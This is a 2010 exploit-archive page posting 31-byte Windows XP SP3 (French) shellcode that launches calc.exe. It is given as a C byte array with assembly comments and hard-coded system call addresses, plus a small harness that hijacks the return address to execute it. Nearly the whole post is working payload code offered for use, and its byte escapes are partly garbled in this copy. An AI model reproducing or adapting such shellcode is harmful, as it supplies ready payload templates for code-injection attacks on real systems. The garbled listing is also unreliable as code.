Home / os / win7

win32/xp sp3 Fr (calc.exe) Shellcode 31 bytes

Posted on 18 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>win32/xp sp3 Fr (calc.exe) Shellcode 31 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================= win32/xp sp3 Fr (calc.exe) Shellcode 31 Bytes ============================================= /* | Title: Windows Xp Pro SP3 Fr (calc.exe) Shellcode 31 Bytes | Type: Shellcode | Author: agix | Platform: win32 */ #include &lt;stdio.h&gt; char shellcode[] = &quot;xEBx10&quot; //jmp short 0x12 &quot;x5B&quot; //pop ebx &quot;x53&quot; //push ebx &quot;xBBxADx23x86x7C&quot; //mov ebx, 0x7c8623ad &quot;xFFxD3&quot; //call ebx &quot;xBBxFAxCAx81x7C&quot; //mov ebx, 0x7c81cafa &quot;xFFxD3&quot; //call ebx &quot;xE8xEBxFFxFFxFF&quot; //call dword 0x2 //db calc.exe &quot;x63x61x6Cx63x2Ex65x78x65&quot;; int main(int argc, char **argv) { int *ret; ret = (int *)&amp;ret + 2; (*ret) = (int) shellcode; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP